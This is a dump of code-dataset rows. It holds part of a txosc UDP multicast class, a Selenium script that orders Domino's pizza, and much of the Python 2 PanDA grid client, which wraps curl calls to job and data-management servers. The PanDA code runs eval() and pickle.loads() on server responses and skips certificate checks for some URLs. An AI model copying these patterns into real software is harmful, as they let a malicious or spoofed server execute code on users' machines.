class MulticastDatagramServerProtocol(DatagramServerProtocol):
"""
UDP OSC server protocol that can listen to multicast.
Here is an example on how to use it:
reactor.listenMulticast(8005, MulticastServerUDP(receiver, "224.0.0.1"), listenMultiple=True)
This way, many listeners can listen on the same port, same host, to the same multicast group. (in this case, the 224.0.0.1 multicast group)
"""
def __init__(self, receiver, multicast_addr="224.0.0.1"):
"""
@param multicast_addr: IP address of the multicast group.
@param receiver: L{txosc.dispatch.Receiver} instance.
@type multicast_addr: str
@type receiver: L{txosc.dispatch.Receiver}
"""
self.multicast_addr = multicast_addr
DatagramServerProtocol.__init__(self, receiver)
def startProtocol(self):
"""
Join a specific multicast group, which is the IP we will respond to
"""
self.transport.joinGroup(self.multicast_addr)
class DatagramClientProtocol(protocol.DatagramProtocol):
"""
The UDP OSC client protocol.
"""
def send(self, element, (host, port)):
"""
Send a L{txosc.osc.Message} or L{txosc.osc.Bundle} to the address specified.
@type element: L{txosc.osc.Message}
"""
data = element.toBinary()
self.transport.write(data, (socket.gethostbyname(host), port))
| 28.765957 | 143 | 0.645895 | 616 | 5,408 | 5.579545 | 0.301948 | 0.038406 | 0.027931 | 0.022112 | 0.137911 | 0.036078 | 0.036078 | 0.019203 | 0.019203 | 0 | 0 | 0.008953 | 0.256472 | 5,408 | 187 | 144 | 28.919786 | 0.84581 | 0.044379 | 0 | 0.169014 | 0 | 0 | 0.028958 | 0 | 0 | 0 | 0 | 0.005348 | 0 | 0 | null | null | 0 | 0.084507 | null | null | 0.014085 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
0e0f6259ba624db7fa0c2c5d4fdc06aa5c711408 | 2,740 | py | Python | main.py | theIsaacLim/hakdPizza | 0471dc6ee9fc049bd10f0a8aa9d707f2c0388fc5 | [
"MIT"
] | null | null | null | main.py | theIsaacLim/hakdPizza | 0471dc6ee9fc049bd10f0a8aa9d707f2c0388fc5 | [
"MIT"
] | null | null | null | main.py | theIsaacLim/hakdPizza | 0471dc6ee9fc049bd10f0a8aa9d707f2c0388fc5 | [
"MIT"
] | null | null | null | from selenium import webdriver
from time import sleep # Sleep will pause the program
import os # for getting the local path
from json import loads
dirpath = os.getcwd() # gets local path
driver = webdriver.Chrome(dirpath + "/chromedriver")
def login(username, password):
global driver
# LOGIN
driver.find_element_by_css_selector(".header-login > span:nth-child(1)").click() # Click login button
usernameField, passwordField = driver.find_element_by_css_selector("#txt-ac-userName"), driver.find_element_by_css_selector("#txt-ac-passWord")
usernameField.send_keys(username)
passwordField.send_keys(password)
loginButton = driver.find_element_by_css_selector("#main > div > div.body > div > div:nth-child(1) > div.operator-bar > div")
loginButton.click()
sleep(4)
def addPizzaToCart(pizzaName, size):
global driver
pizzaText = driver.find_element_by_xpath('//div[text() = "{}"]'.format(pizzaName)) # uses xpath to select the pizza label element
# Here, we have the label that says what pizza it is
# This isn't what we want though
#
# We want to click the button that says to buy
# To do that, we have to have a look at the actual structure of the page
# The label and the button are all wrapped in a bigger div. We can get the button by finding
# the label's parent and getting it's child, the button
#
# That's essentially what the following code does
containerDiv = pizzaText.find_element_by_xpath('..')
button = containerDiv.find_element_by_css_selector("a[data-mltext='p-buy']")
buttonWrapperSpan = button.find_element_by_xpath('..')
# Okay so what happens here is that it should in theory open up a modal window that allows you to tick certain options
scriptFunction = buttonWrapperSpan.get_attribute('onclick') # This is the function that opens the modal window
driver.execute_script(scriptFunction) # Execute that function
sleep(5)
driver.switch_to.frame("iframe")
driver.execute_script("SizeClick('{}');".format(size))
driver.execute_script("AddShoppingCar();")
def checkout():
driver.get("http://www.dominos.com.cn/order/cart.html")
driver.execute_script("ConfirmOrder();")
# GET PAGE AND CHANGE LANGUAGE TO ENGLISH
driver.get("http://www.dominos.com.cn/menu/menu.html?menuIndex=0&RNDSEED=c42905609c237eff75c1bd6767345f43") # dominos menu page
login("username", "password")
english = driver.find_element_by_css_selector('#lanEn > a')
english.click() # click on english to change tha language
sleep(7) # Wait for the website to update
rawText = open("order.json").read()
orderDict = loads(rawText)
for order in orderDict:
addPizzaToCart(order["name"], order["size"])
sleep(2)
| 42.153846 | 147 | 0.729562 | 389 | 2,740 | 5.033419 | 0.421594 | 0.050562 | 0.059755 | 0.058223 | 0.122574 | 0.110317 | 0.064351 | 0.035751 | 0 | 0 | 0 | 0.013089 | 0.163504 | 2,740 | 64 | 148 | 42.8125 | 0.841187 | 0.309854 | 0 | 0.05 | 0 | 0.05 | 0.232994 | 0.011784 | 0 | 0 | 0 | 0 | 0 | 1 | 0.075 | false | 0.1 | 0.1 | 0 | 0.175 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
0e0fc6085ae3cea9518a28dc404a0b76c2ffa235 | 127,770 | py | Python | pandatools/Client.py | Jon-Burr/panda-client | ff7ee8fc8481537cf604d983340eda102f041a20 | [
"Apache-2.0"
] | null | null | null | pandatools/Client.py | Jon-Burr/panda-client | ff7ee8fc8481537cf604d983340eda102f041a20 | [
"Apache-2.0"
] | null | null | null | pandatools/Client.py | Jon-Burr/panda-client | ff7ee8fc8481537cf604d983340eda102f041a20 | [
"Apache-2.0"
] | null | null | null | '''
client methods
'''
import os
if os.environ.has_key('PANDA_DEBUG'):
print "DEBUG : importing %s" % __name__
import re
import sys
import time
import stat
import types
try:
import json
except:
import simplejson as json
import random
import urllib
import struct
import commands
import cPickle as pickle
import xml.dom.minidom
import socket
import tempfile
import MiscUtils
import PLogger
# configuration
try:
baseURL = os.environ['PANDA_URL']
except:
baseURL = 'http://pandaserver.cern.ch:25080/server/panda'
try:
baseURLSSL = os.environ['PANDA_URL_SSL']
except:
baseURLSSL = 'https://pandaserver.cern.ch:25443/server/panda'
baseURLDQ2 = 'http://atlddmcat-reader.cern.ch/dq2'
baseURLDQ2SSL = 'https://atlddmcat-writer.cern.ch:443/dq2'
baseURLSUB = "http://pandaserver.cern.ch:25080/trf/user"
baseURLMON = "http://panda.cern.ch:25980/server/pandamon/query"
baseURLCSRV = "http://pandacache.cern.ch:25080/server/panda"
baseURLCSRVSSL = "http://pandacache.cern.ch:25443/server/panda"
#baseURLCSRV = "http://aipanda011.cern.ch:25080/server/panda"
#baseURLCSRVSSL = "http://aipanda011.cern.ch:25443/server/panda"
# exit code
EC_Failed = 255
# default max size per job
maxTotalSize = long(14*1024*1024*1024)
# safety size for input size calculation
safetySize = long(500*1024*1024)
# suffix for shadow dataset
suffixShadow = "_shadow"
# limit on maxCpuCount
maxCpuCountLimit = 1000000000
# retrieve pathena config
try:
# get default timeout
defTimeOut = socket.getdefaulttimeout()
# set timeout
socket.setdefaulttimeout(60)
except:
pass
if os.environ.has_key('PANDA_DEBUG'):
print "DEBUG : getting panda cache server's name"
# get panda cache server's name
try:
getServerURL = baseURLCSRV + '/getServer'
res = urllib.urlopen(getServerURL)
# overwrite URL
baseURLCSRVSSL = "https://%s/server/panda" % res.read()
except:
type, value, traceBack = sys.exc_info()
print type,value
print "ERROR : could not getServer from %s" % getServerURL
sys.exit(EC_Failed)
try:
# reset timeout
socket.setdefaulttimeout(defTimeOut)
except:
pass
if os.environ.has_key('PANDA_DEBUG'):
print "DEBUG : ready"
# look for a grid proxy certificate
def _x509():
# see X509_USER_PROXY
try:
return os.environ['X509_USER_PROXY']
except:
pass
# see the default place
x509 = '/tmp/x509up_u%s' % os.getuid()
if os.access(x509,os.R_OK):
return x509
# no valid proxy certificate
# FIXME
print "No valid grid proxy certificate found"
return ''
# look for a CA certificate directory
def _x509_CApath():
# use X509_CERT_DIR
try:
return os.environ['X509_CERT_DIR']
except:
pass
# get X509_CERT_DIR
gridSrc = _getGridSrc()
com = "%s echo $X509_CERT_DIR" % gridSrc
tmpOut = commands.getoutput(com)
return tmpOut.split('\n')[-1]
# keep list of tmp files for cleanup
globalTmpDir = ''
# curl class
class _Curl:
# constructor
def __init__(self):
# path to curl
self.path = 'curl --user-agent "dqcurl" '
# verification of the host certificate
self.verifyHost = True
# request a compressed response
self.compress = True
# SSL cert/key
self.sslCert = ''
self.sslKey = ''
# verbose
self.verbose = False
# GET method
def get(self,url,data,rucioAccount=False):
# make command
com = '%s --silent --get' % self.path
if not self.verifyHost or not url.startswith('https://'):
com += ' --insecure'
else:
tmp_x509_CApath = _x509_CApath()
if tmp_x509_CApath != '':
com += ' --capath %s' % tmp_x509_CApath
if self.compress:
com += ' --compressed'
if self.sslCert != '':
com += ' --cert %s' % self.sslCert
com += ' --cacert %s' % self.sslCert
if self.sslKey != '':
com += ' --key %s' % self.sslKey
# max time of 10 min
com += ' -m 600'
# add rucio account info
if rucioAccount:
if os.environ.has_key('RUCIO_ACCOUNT'):
data['account'] = os.environ['RUCIO_ACCOUNT']
if os.environ.has_key('RUCIO_APPID'):
data['appid'] = os.environ['RUCIO_APPID']
data['client_version'] = '2.4.1'
# data
strData = ''
for key in data.keys():
strData += 'data="%s"\n' % urllib.urlencode({key:data[key]})
# write data to temporary config file
if globalTmpDir != '':
tmpFD,tmpName = tempfile.mkstemp(dir=globalTmpDir)
else:
tmpFD,tmpName = tempfile.mkstemp()
os.write(tmpFD,strData)
os.close(tmpFD)
com += ' --config %s' % tmpName
com += ' %s' % url
# execute
if self.verbose:
print com
print strData[:-1]
s,o = commands.getstatusoutput(com)
if o != '\x00':
try:
tmpout = urllib.unquote_plus(o)
o = eval(tmpout)
except:
pass
ret = (s,o)
# remove temporary file
os.remove(tmpName)
ret = self.convRet(ret)
if self.verbose:
print ret
return ret
# POST method
def post(self,url,data,rucioAccount=False):
# make command
com = '%s --silent' % self.path
if not self.verifyHost or not url.startswith('https://'):
com += ' --insecure'
else:
tmp_x509_CApath = _x509_CApath()
if tmp_x509_CApath != '':
com += ' --capath %s' % tmp_x509_CApath
if self.compress:
com += ' --compressed'
if self.sslCert != '':
com += ' --cert %s' % self.sslCert
com += ' --cacert %s' % self.sslCert
if self.sslKey != '':
com += ' --key %s' % self.sslKey
# max time of 10 min
com += ' -m 600'
# add rucio account info
if rucioAccount:
if os.environ.has_key('RUCIO_ACCOUNT'):
data['account'] = os.environ['RUCIO_ACCOUNT']
if os.environ.has_key('RUCIO_APPID'):
data['appid'] = os.environ['RUCIO_APPID']
data['client_version'] = '2.4.1'
# data
strData = ''
for key in data.keys():
strData += 'data="%s"\n' % urllib.urlencode({key:data[key]})
# write data to temporary config file
if globalTmpDir != '':
tmpFD,tmpName = tempfile.mkstemp(dir=globalTmpDir)
else:
tmpFD,tmpName = tempfile.mkstemp()
os.write(tmpFD,strData)
os.close(tmpFD)
com += ' --config %s' % tmpName
com += ' %s' % url
# execute
if self.verbose:
print com
print strData[:-1]
s,o = commands.getstatusoutput(com)
if o != '\x00':
try:
tmpout = urllib.unquote_plus(o)
o = eval(tmpout)
except:
pass
ret = (s,o)
# remove temporary file
os.remove(tmpName)
ret = self.convRet(ret)
if self.verbose:
print ret
return ret
# PUT method
def put(self,url,data):
# make command
com = '%s --silent' % self.path
if not self.verifyHost or not url.startswith('https://'):
com += ' --insecure'
else:
tmp_x509_CApath = _x509_CApath()
if tmp_x509_CApath != '':
com += ' --capath %s' % tmp_x509_CApath
if self.compress:
com += ' --compressed'
if self.sslCert != '':
com += ' --cert %s' % self.sslCert
com += ' --cacert %s' % self.sslCert
if self.sslKey != '':
com += ' --key %s' % self.sslKey
# emulate PUT
for key in data.keys():
com += ' -F "%s=@%s"' % (key,data[key])
com += ' %s' % url
if self.verbose:
print com
# execute
ret = commands.getstatusoutput(com)
ret = self.convRet(ret)
if self.verbose:
print ret
return ret
# convert return
def convRet(self,ret):
if ret[0] != 0:
ret = (ret[0]%255,ret[1])
# add messages to silent errors
if ret[0] == 35:
ret = (ret[0],'SSL connect error. The SSL handshaking failed. Check grid certificate/proxy.')
elif ret[0] == 7:
ret = (ret[0],'Failed to connect to host.')
elif ret[0] == 55:
ret = (ret[0],'Failed sending network data.')
elif ret[0] == 56:
ret = (ret[0],'Failure in receiving network data.')
return ret
'''
public methods
'''
# get site specs
def getSiteSpecs(siteType=None):
# instantiate curl
curl = _Curl()
# execute
url = baseURL + '/getSiteSpecs'
data = {}
if siteType != None:
data['siteType'] = siteType
status,output = curl.get(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
errStr = "ERROR getSiteSpecs : %s %s" % (type,value)
print errStr
return EC_Failed,output+'\n'+errStr
# get cloud specs
def getCloudSpecs():
# instantiate curl
curl = _Curl()
# execute
url = baseURL + '/getCloudSpecs'
status,output = curl.get(url,{})
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
errStr = "ERROR getCloudSpecs : %s %s" % (type,value)
print errStr
return EC_Failed,output+'\n'+errStr
# refresh spacs at runtime
def refreshSpecs():
global PandaSites
global PandaClouds
# get Panda Sites
tmpStat,PandaSites = getSiteSpecs()
if tmpStat != 0:
print "ERROR : cannot get Panda Sites"
sys.exit(EC_Failed)
for id, val in PandaSites.iteritems():
if 'setokens' not in val:
if 'setokens_output' in val:
val['setokens'] = val['setokens_output']
else:
val['setokens'] = {}
# get cloud info
tmpStat,PandaClouds = getCloudSpecs()
if tmpStat != 0:
print "ERROR : cannot get Panda Clouds"
sys.exit(EC_Failed)
# initialize spacs
refreshSpecs()
# get LRC
def getLRC(site):
ret = None
# look for DQ2ID
for id,val in PandaSites.iteritems():
if id == site or val['ddm'] == site:
if not val['dq2url'] in [None,"","None"]:
ret = val['dq2url']
break
return ret
# get LFC
def getLFC(site):
ret = None
# use explicit matching for sitename
if PandaSites.has_key(site):
val = PandaSites[site]
if not val['lfchost'] in [None,"","None"]:
ret = val['lfchost']
return ret
# look for DQ2ID
for id,val in PandaSites.iteritems():
if id == site or val['ddm'] == site:
if not val['lfchost'] in [None,"","None"]:
ret = val['lfchost']
break
return ret
# get SEs
def getSE(site):
ret = []
# use explicit matching for sitename
if PandaSites.has_key(site):
val = PandaSites[site]
if not val['se'] in [None,"","None"]:
for tmpSE in val['se'].split(','):
match = re.search('.+://([^:/]+):*\d*/*',tmpSE)
if match != None:
ret.append(match.group(1))
return ret
# look for DQ2ID
for id,val in PandaSites.iteritems():
if id == site or val['ddm'] == site:
if not val['se'] in [None,"","None"]:
for tmpSE in val['se'].split(','):
match = re.search('.+://([^:/]+):*\d*/*',tmpSE)
if match != None:
ret.append(match.group(1))
break
# return
return ret
# convert DQ2 ID to Panda siteid
def convertDQ2toPandaID(site, getAll=False):
keptSite = ''
siteList = []
for tmpID,tmpSpec in PandaSites.iteritems():
# # exclude long,xrootd,local queues
if isExcudedSite(tmpID):
continue
# get list of DQ2 IDs
srmv2ddmList = []
for tmpDdmID in tmpSpec['setokens'].values():
srmv2ddmList.append(convSrmV2ID(tmpDdmID))
# use Panda sitename
if convSrmV2ID(site) in srmv2ddmList:
keptSite = tmpID
# keep non-online site just in case
if tmpSpec['status']=='online':
if not getAll:
return keptSite
siteList.append(keptSite)
if getAll:
return ','.join(siteList)
return keptSite
# convert DQ2 ID to Panda site IDs
def convertDQ2toPandaIDList(site):
sites = []
sitesOff = []
for tmpID,tmpSpec in PandaSites.iteritems():
# # exclude long,xrootd,local queues
if isExcudedSite(tmpID):
continue
# get list of DQ2 IDs
srmv2ddmList = []
for tmpDdmID in tmpSpec['setokens'].values():
srmv2ddmList.append(convSrmV2ID(tmpDdmID))
# use Panda sitename
if convSrmV2ID(site) in srmv2ddmList:
# append
if tmpSpec['status']=='online':
if not tmpID in sites:
sites.append(tmpID)
else:
# keep non-online site just in case
if not tmpID in sitesOff:
sitesOff.append(tmpID)
# return
if sites != []:
return sites
return sitesOff
# convert to long queue
def convertToLong(site):
tmpsite = re.sub('ANALY_','ANALY_LONG_',site)
tmpsite = re.sub('_\d+$','',tmpsite)
# if sitename exists
if PandaSites.has_key(tmpsite):
site = tmpsite
return site
# submit jobs
def submitJobs(jobs,verbose=False):
# set hostname
hostname = commands.getoutput('hostname')
for job in jobs:
job.creationHost = hostname
# serialize
strJobs = pickle.dumps(jobs)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/submitJobs'
data = {'jobs':strJobs}
status,output = curl.post(url,data)
if status!=0:
print output
return status,None
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR submitJobs : %s %s" % (type,value)
return EC_Failed,None
# get job status
def getJobStatus(ids):
# serialize
strIDs = pickle.dumps(ids)
# instantiate curl
curl = _Curl()
# execute
url = baseURL + '/getJobStatus'
data = {'ids':strIDs}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR getJobStatus : %s %s" % (type,value)
return EC_Failed,None
# kill jobs
def killJobs(ids,verbose=False):
# serialize
strIDs = pickle.dumps(ids)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/killJobs'
data = {'ids':strIDs}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR killJobs : %s %s" % (type,value)
return EC_Failed,None
# kill task
def killTask(jediTaskID,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/killTask'
data = {'jediTaskID':jediTaskID}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR killTask : %s %s" % (type,value)
return EC_Failed,None
# finish task
def finishTask(jediTaskID,soft=False,verbose=False):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/finishTask'
data = {'jediTaskID':jediTaskID}
if soft:
data['soft'] = True
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR finishTask : %s %s" % (type,value)
return EC_Failed,None
# retry task
def retryTask(jediTaskID,verbose=False,properErrorCode=False,newParams=None):
if newParams == None:
newParams = {}
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# execute
url = baseURLSSL + '/retryTask'
data = {'jediTaskID':jediTaskID,
'properErrorCode':properErrorCode}
if newParams != {}:
data['newParams'] = json.dumps(newParams)
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR retryTask : %s %s" % (type,value)
return EC_Failed,None
# reassign jobs
def reassignJobs(ids):
# serialize
strIDs = pickle.dumps(ids)
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
# execute
url = baseURLSSL + '/reassignJobs'
data = {'ids':strIDs}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR reassignJobs : %s %s" % (type,value)
return EC_Failed,None
# query PandaIDs
def queryPandaIDs(ids):
# serialize
strIDs = pickle.dumps(ids)
# instantiate curl
curl = _Curl()
# execute
url = baseURL + '/queryPandaIDs'
data = {'ids':strIDs}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR queryPandaIDs : %s %s" % (type,value)
return EC_Failed,None
# query last files in datasets
def queryLastFilesInDataset(datasets,verbose=False):
# serialize
strDSs = pickle.dumps(datasets)
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# execute
url = baseURL + '/queryLastFilesInDataset'
data = {'datasets':strDSs}
status,output = curl.post(url,data)
try:
return status,pickle.loads(output)
except:
type, value, traceBack = sys.exc_info()
print "ERROR queryLastFilesInDataset : %s %s" % (type,value)
return EC_Failed,None
# put file
def putFile(file,verbose=False,useCacheSrv=False,reuseSandbox=False):
# size check for noBuild
sizeLimit = 10*1024*1024
fileSize = os.stat(file)[stat.ST_SIZE]
if not os.path.basename(file).startswith('sources.'):
if fileSize > sizeLimit:
errStr = 'Exceeded size limit (%sB >%sB). ' % (fileSize,sizeLimit)
errStr += 'Your working directory contains too large files which cannot be put on cache area. '
errStr += 'Please submit job without --noBuild/--libDS so that your files will be uploaded to SE'
# get logger
tmpLog = PLogger.getPandaLogger()
tmpLog.error(errStr)
return EC_Failed,'False'
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
curl.verbose = verbose
# check duplicationn
if reuseSandbox:
# get CRC
fo = open(file)
fileContent = fo.read()
fo.close()
footer = fileContent[-8:]
checkSum,isize = struct.unpack("II",footer)
# check duplication
url = baseURLSSL + '/checkSandboxFile'
data = {'fileSize':fileSize,'checkSum':checkSum}
status,output = curl.post(url,data)
if status != 0:
return EC_Failed,'ERROR: Could not check Sandbox duplication with %s' % status
elif output.startswith('FOUND:'):
# found reusable sandbox
hostName,reuseFileName = output.split(':')[1:]
# set cache server hostname
global baseURLCSRVSSL
baseURLCSRVSSL = "https://%s:25443/server/panda" % hostName
# return reusable filename
return 0,"NewFileName:%s" % reuseFileName
# execute
if useCacheSrv:
url = baseURLCSRVSSL + '/putFile'
else:
url = baseURLSSL + '/putFile'
data = {'file':file}
return curl.put(url,data)
# delete file
def deleteFile(file):
# instantiate curl
curl = _Curl()
curl.sslCert = _x509()
curl.sslKey = _x509()
# execute
url = baseURLSSL + '/deleteFile'
data = {'file':file}
return curl.post(url,data)
# check dataset in map by ignoring case sensitivity
def checkDatasetInMap(name,outMap):
try:
for tmpKey in outMap.keys():
if name.upper() == tmpKey.upper():
return True
except:
pass
return False
# get real dataset name from map by ignoring case sensitivity
def getDatasetValueInMap(name,outMap):
for tmpKey in outMap.keys():
if name.upper() == tmpKey.upper():
return tmpKey
# return original name
return name
# query files in dataset
def queryFilesInDataset(name,verbose=False,v_vuids=None,getDsString=False,dsStringOnly=False):
# instantiate curl
curl = _Curl()
curl.verbose = verbose
# for container failure
status,out = 0,''
nameVuidsMap = {}
dsString = ''
try:
errStr = ''
# get VUID
if v_vuids == None:
url = baseURLDQ2 + '/ws_repository/rpc'
if re.search(',',name) != None:
# comma-separated list
names = name.split(',')
elif name.endswith('/'):
# container
names = [name]
else:
names = [name]
# loop over all names
vuidList = []
iLookUp = 0
for tmpName in names:
iLookUp += 1
if iLookUp % 20 == 0:
time.sleep(1)
data = {'operation':'queryDatasetByName','dsn':tmpName,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.get(url,data,rucioAccount=True)
if status != 0 or out == '\x00' or (re.search('\*',tmpName) == None and not checkDatasetInMap(tmpName,out)):
errStr = "ERROR : could not find %s in DQ2 DB. Check if the dataset name is correct" \
% tmpName
sys.exit(EC_Failed)
# parse
if re.search('\*',tmpName) == None:
# get real dataset name
tmpName = getDatasetValueInMap(tmpName,out)
vuidList.append(out[tmpName]['vuids'])
# mapping between name and vuids
nameVuidsMap[tuple(out[tmpName]['vuids'])] = tmpName
# string to expand wildcard
dsString += '%s,' % tmpName
else:
# using wildcard
for outKeyName in out.keys():
# skip sub/dis
if re.search('_dis\d+$',outKeyName) != None or re.search('_sub\d+$',outKeyName) != None:
continue
# append
vuidList.append(out[outKeyName]['vuids'])
# mapping between name and vuids
nameVuidsMap[tuple(out[outKeyName]['vuids'])] = outKeyName
# string to expand wildcard
dsString += '%s,' % outKeyName
else:
vuidList = [v_vuids]
if dsStringOnly:
return dsString[:-1]
# reset for backward comatiblity when * or , is not used
if re.search('\*',name) == None and re.search(',',name) == None:
nameVuidsMap = {}
dsString = ''
# get files
url = baseURLDQ2 + '/ws_content/rpc'
ret = {}
generalLFNmap = {}
iLookUp = 0
for vuids in vuidList:
iLookUp += 1
if iLookUp % 20 == 0:
time.sleep(1)
data = {'operation': 'queryFilesInDataset','vuids':vuids,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
status,out = curl.post(url,data,rucioAccount=True)
if status != 0:
errStr = "ERROR : could not get files in %s" % name
sys.exit(EC_Failed)
# parse
if out == '\x00' or len(out) < 2 or out==():
# empty
continue
for guid,vals in out[0].iteritems():
# remove attemptNr
generalLFN = re.sub('\.\d+$','',vals['lfn'])
# choose greater attempt to avoid duplication
if generalLFNmap.has_key(generalLFN):
if vals['lfn'] > generalLFNmap[generalLFN]:
# remove lesser attempt
del ret[generalLFNmap[generalLFN]]
else:
continue
# append to map
generalLFNmap[generalLFN] = vals['lfn']
ret[vals['lfn']] = {'guid' : guid,
'fsize' : vals['filesize'],
'md5sum' : vals['checksum'],
'scope' : vals['scope']}
# add dataset name
if nameVuidsMap.has_key(tuple(vuids)):
ret[vals['lfn']]['dataset'] = nameVuidsMap[tuple(vuids)]
except:
print status,out
if errStr != '':
print errStr
else:
print "ERROR : invalid DQ2 response"
sys.exit(EC_Failed)
if getDsString:
return ret,dsString[:-1]
return ret
# get datasets
def getDatasets(name,verbose=False,withWC=False,onlyNames=False):
# instantiate curl
curl = _Curl()
curl.verbose = verbose
try:
errStr = ''
# get VUID
url = baseURLDQ2 + '/ws_repository/rpc'
data = {'operation':'queryDatasetByName','dsn':name,'version':0,
'API':'0_3_0','tuid':MiscUtils.wrappedUuidGen()}
if onlyNames:
data['API'] = '30'
data['onlyNames'] = int(onlyNames)
status,out = curl.get(url,data,rucioAccount=True)
if status != 0:
errStr = "ERROR : could not access DQ2 server"
sys.exit(EC_Failed)
# parse
datasets = {}
if out == '\x00' or ((not withWC) and (not checkDatasetInMap(name,out))):
# no datasets
return datasets
# get names only
if isinstance(out,types.DictionaryType):
return out
else:
# wrong format
errStr = "ERROR : DQ2 didn't give a dictionary for %s" % name
sys.exit(EC_Failed)
# get VUIDs
for dsname,idMap in out.iteritems():
# check format
if idMap.has_key('vuids') and len(idMap['vuids'])>0:
datasets[dsname] = idMap['vuids'][0]
else:
# wrong format
errStr = "ERROR : could not parse HTTP response for %s" % name
sys.exit(EC_Failed)
except:
print status,out
if errStr != '':
print errStr
else:
print "ERROR : invalid DQ2 response"
sys.exit(EC_Failed)
return datasets
# disable expiring file check
globalUseShortLivedReplicas = False
def useExpiringFiles():
global globalUseShortLivedReplicas
globalUseShortLivedReplicas = True
# get expiring files
globalCompleteDsMap = {}
globalExpFilesMap = {}
globalExpOkFilesMap = {}
globalExpCompDq2FilesMap = {}
def getExpiringFiles(dsStr,removedDS,siteID,verbose,getOKfiles=False):
# convert * in dsStr
if re.search('\*',dsStr) != None:
dsStr = queryFilesInDataset(dsStr,verbose,dsStringOnly=True)
# reuse map
global globalExpFilesMap
global globalExpOkFilesMap
global expCompDq2FilesList
global globalUseShortLivedReplicas
mapKey = (dsStr,siteID)
if globalExpFilesMap.has_key(mapKey):
if getOKfiles:
return globalExpFilesMap[mapKey],globalExpOkFilesMap[mapKey],globalExpCompDq2FilesMap[mapKey]
return globalExpFilesMap[mapKey]
# get logger
tmpLog = PLogger.getPandaLogger()
if verbose:
tmpLog.debug("checking metadata for %s, removed=%s " % (dsStr,str(removedDS)))
# get DQ2 location and used data
tmpLocations,dsUsedDsMap = getLocations(dsStr,[],'',False,verbose,getDQ2IDs=True,
removedDatasets=removedDS,
useOutContainer=True,
includeIncomplete=True,
notSiteStatusCheck=True)
# get all sites matching with site's DQ2ID here, to work with brokeroff sites
fullSiteList = convertDQ2toPandaIDList(PandaSites[siteID]['ddm'])
# get datasets at the site
datasets = []
for tmpDsUsedDsMapKey,tmpDsUsedDsVal in dsUsedDsMap.iteritems():
siteMatched = False
for tmpTargetID in fullSiteList:
# check with short/long siteID
if tmpDsUsedDsMapKey in [tmpTargetID,convertToLong(tmpTargetID)]:
datasets = tmpDsUsedDsVal
siteMatched = True
break
if siteMatched:
break
# not found
if datasets == []:
tmpLog.error("cannot find datasets at %s for replica metadata check" % siteID)
sys.exit(EC_Failed)
# loop over all datasets
convertedOrigSite = convSrmV2ID(PandaSites[siteID]['ddm'])
expFilesMap = {'datasets':[],'files':[]}
expOkFilesList = []
expCompDq2FilesList = []
for dsName in datasets:
# get DQ2 IDs for the siteID
dq2Locations = []
if tmpLocations.has_key(dsName):
for tmpLoc in tmpLocations[dsName]:
# check Panda site IDs
for tmpPandaSiteID in convertDQ2toPandaIDList(tmpLoc):
if tmpPandaSiteID in fullSiteList:
if not tmpLoc in dq2Locations:
dq2Locations.append(tmpLoc)
break
# check prefix mainly for MWT2 and MWT2_UC
convertedScannedID = convSrmV2ID(tmpLoc)
if convertedOrigSite.startswith(convertedScannedID) or \
convertedScannedID.startswith(convertedOrigSite):
if not tmpLoc in dq2Locations:
dq2Locations.append(tmpLoc)
# empty
if dq2Locations == []:
tmpLog.error("cannot find replica locations for %s:%s to check metadata" % (siteID,dsName))
sys.exit(EC_Failed)
# check completeness
compInDQ2 = False
global globalCompleteDsMap
if globalCompleteDsMap.has_key(dsName):
for tmpDQ2Loc in dq2Locations:
if tmpDQ2Loc in globalCompleteDsMap[dsName]:
compInDQ2 = True
break
# get metadata
metaList = getReplicaMetadata(dsName,dq2Locations,verbose)
# check metadata
metaOK = False
for metaItem in metaList:
# replica deleted
if isinstance(metaItem,types.StringType) and "No replica found at the location" in metaItem:
continue
if not globalUseShortLivedReplicas:
# check the archived attribute
if isinstance(metaItem['archived'],types.StringType) and metaItem['archived'].lower() in ['tobedeleted',]:
continue
# check replica lifetime
